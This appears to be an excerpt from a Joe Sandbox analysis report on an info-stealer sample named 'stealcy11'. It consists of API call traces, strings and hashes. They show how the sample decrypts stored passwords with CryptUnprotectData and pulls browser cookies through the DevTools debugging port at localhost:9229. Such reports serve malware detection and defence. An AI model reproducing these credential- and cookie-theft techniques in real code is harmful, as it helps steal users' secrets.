                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 2819545660-3542011879
                                  • Opcode ID: 426fde87631ff846a7b79cdd9e980636d071d9ef92361c7210673f912da97010
                                  • Instruction ID: d4fe9b99117c378ce1175b4bf4d3bbf1f3756f3c90e7f5dfeede47d9c4a76b84
                                  • Opcode Fuzzy Hash: 426fde87631ff846a7b79cdd9e980636d071d9ef92361c7210673f912da97010
                                  • Instruction Fuzzy Hash: 77E11470E10258EFDF10EFA9C884ADDBBB5FF49304F5044A9E549E7281DB709A45CB91
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 0090182F
                                  • lstrlenA.KERNEL32(010BFA80,00000000,00000000,?,?,00901B61), ref: 00901840
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901867
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00901872
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 009018A1
                                  • lstrlenA.KERNEL32(00915558,?,?,00901B61), ref: 009018B3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 009018D4
                                  • lstrcatA.KERNEL32(00000000,00915558,?,?,00901B61), ref: 009018E0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0090190F
                                  • lstrlenA.KERNEL32(010B65F0,?,?,00901B61), ref: 00901925
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0090194C
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00901957
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901986
                                  • lstrlenA.KERNEL32(00915558,?,?,00901B61), ref: 00901998
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 009019B9
                                  • lstrcatA.KERNEL32(00000000,00915558,?,?,00901B61), ref: 009019C5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 009019F4
                                  • lstrlenA.KERNEL32(010C1430,?,?,00901B61), ref: 00901A0A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A31
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00901A3C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A6B
                                  • lstrlenA.KERNEL32(010C1440,?,?,00901B61), ref: 00901A81
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AA8
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00901AB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: 3ac3cdd684c42d1c41ace23f5f212c99c661a60367fcdeb77a9d1becf36c2515
                                  • Instruction ID: c590f5ee3a6437ba81a3ea97204a15c9a386bb518324570625e62c6b1f466b73
                                  • Opcode Fuzzy Hash: 3ac3cdd684c42d1c41ace23f5f212c99c661a60367fcdeb77a9d1becf36c2515
                                  • Instruction Fuzzy Hash: 4E913DB5601743AFD720AFB9DC98A57B7EDFF05300B148829A895D32A1DF74DD818B60
                                  APIs
                                  • StrCmpCA.SHLWAPI(?,block,?,?,?,?,0090081F), ref: 008F8D1A
                                  • ExitProcess.KERNEL32 ref: 008F8D27
                                  • strtok_s.MSVCRT ref: 008F8D39
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcessstrtok_s
                                  • String ID: block
                                  • API String ID: 3407564107-2199623458
                                  • Opcode ID: 443177c69bdca474e0295399a07a2f19cf62508cb4138c650ee7af5022da01d5
                                  • Instruction ID: a93dbd44f2dab7f24af1fdd057d254bf339b88a6dec8fd5f4c94538224cb5d6e
                                  • Opcode Fuzzy Hash: 443177c69bdca474e0295399a07a2f19cf62508cb4138c650ee7af5022da01d5
                                  • Instruction Fuzzy Hash: 495170B0A08749EFC7209F75EC88A7A77F5FB48708B40486EE652D7620DFB4E4418B21
                                  APIs
                                  • InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E910F
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E912C
                                  • InternetCloseHandle.WININET(00000000), ref: 008E9139
                                  • strlen.MSVCRT ref: 008E9155
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 008E9196
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 008E91C7
                                  • InternetCloseHandle.WININET(00000000), ref: 008E91D2
                                  • InternetCloseHandle.WININET(00000000), ref: 008E91D9
                                  • strlen.MSVCRT ref: 008E91EA
                                  • strlen.MSVCRT ref: 008E921D
                                  • strlen.MSVCRT ref: 008E925E
                                    • Part of subcall function 008F7EB0: memchr.MSVCRT ref: 008F7EEF
                                    • Part of subcall function 008F7EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 008F7F09
                                    • Part of subcall function 008F7EB0: memchr.MSVCRT ref: 008F7F28
                                  • strlen.MSVCRT ref: 008E927C
                                    • Part of subcall function 008E89B0: std::_Xinvalid_argument.LIBCPMT ref: 008E89C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 4166274400-2144369209
                                  • Opcode ID: 870323bf26d6577b900d51502743052fadff30c10a90205105f3e2f1d14ebb04
                                  • Instruction ID: 227fd886baa6fb9687f12138ca60ba11f8326e7cfdce3493ab185a2aeefdff2e
                                  • Opcode Fuzzy Hash: 870323bf26d6577b900d51502743052fadff30c10a90205105f3e2f1d14ebb04
                                  • Instruction Fuzzy Hash: 5151DC71700249ABDB20DFA8DC45BEEB7F9EF84710F144465FA05E3290DBB4DA458761
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7745
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E778A
                                  • strlen.MSVCRT ref: 008E77BE
                                  • StrStrA.SHLWAPI(?,Password), ref: 008E77F8
                                  • strlen.MSVCRT ref: 008E788D
                                    • Part of subcall function 008E7690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 008E769E
                                    • Part of subcall function 008E7690: HeapAlloc.KERNEL32(00000000), ref: 008E76A5
                                    • Part of subcall function 008E7690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E76CD
                                    • Part of subcall function 008E7690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008E76ED
                                    • Part of subcall function 008E7690: LocalFree.KERNEL32(?), ref: 008E76F7
                                  • strcpy_s.MSVCRT ref: 008E7821
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E782C
                                  • HeapFree.KERNEL32(00000000), ref: 008E7833
                                  • strlen.MSVCRT ref: 008E7840
                                  • strcpy_s.MSVCRT ref: 008E786A
                                  • strlen.MSVCRT ref: 008E78B4
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 008E7975
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 3893107980-3434357891
                                  • Opcode ID: 106c8f607cb034a4fa94768edcf461030e0b7fe2d23e22cb030d6d757811e595
                                  • Instruction ID: ceb7bc630537270a3380240c2452bb9eab029a0df9281c3db564f9619aaeef4e
                                  • Opcode Fuzzy Hash: 106c8f607cb034a4fa94768edcf461030e0b7fe2d23e22cb030d6d757811e595
                                  • Instruction Fuzzy Hash: B9810CB1D0025DAFDB10DF95DC84ADEBBB9FF49300F10816AE509E7250EB359A85CBA1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF134
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF162
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF176
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF185
                                  • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF1A3
                                  • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF1D1
                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF1E4
                                  • strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF1F6
                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008FF67A), ref: 008FF202
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF24F
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF28F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                  • String ID: ERROR
                                  • API String ID: 2137491262-2861137601
                                  • Opcode ID: 0ccb198f16557ad731565c158123a5b1a920426cce087d492a64593b97b820d3
                                  • Instruction ID: eeaea77859745d1e0d77873dd87a69061edbc88c2fdd969200f011df2ab6df6e
                                  • Opcode Fuzzy Hash: 0ccb198f16557ad731565c158123a5b1a920426cce087d492a64593b97b820d3
                                  • Instruction Fuzzy Hash: 4051BE35A102899FCB21AF79CC49ABE7BA8FF85710F054564FA49DB222DB70DC428791
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(010CD738,00B19BD8,0000FFFF), ref: 008EA086
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008EA0B3
                                  • lstrlenA.KERNEL32(00B19BD8), ref: 008EA0C0
                                  • lstrcpy.KERNEL32(00000000,00B19BD8), ref: 008EA0EA
                                  • lstrlenA.KERNEL32(00915204), ref: 008EA0F5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA112
                                  • lstrcatA.KERNEL32(00000000,00915204), ref: 008EA11E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA144
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 008EA14F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA174
                                  • SetEnvironmentVariableA.KERNEL32(010CD738,00000000), ref: 008EA18F
                                  • LoadLibraryA.KERNEL32(010D0AD0), ref: 008EA1A3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: a3273726c6a914127deaf9bd78df3fb213a825522ea82374cead74b4ba295570
                                  • Instruction ID: 1211a363534f8593f23fdd25d93abc767daa5756835588dabefbb3f5425416e0
                                  • Opcode Fuzzy Hash: a3273726c6a914127deaf9bd78df3fb213a825522ea82374cead74b4ba295570
                                  • Instruction Fuzzy Hash: 9E91D535600A80DFD7249FBADC44AA637B5FB46B04F818528F505D7361EFB1ED818B92
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008EBD0F
                                  • lstrlenA.KERNEL32(00000000), ref: 008EBD42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EBD6C
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 008EBD74
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008EBD9C
                                  • lstrlenA.KERNEL32(0091508C), ref: 008EBE13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
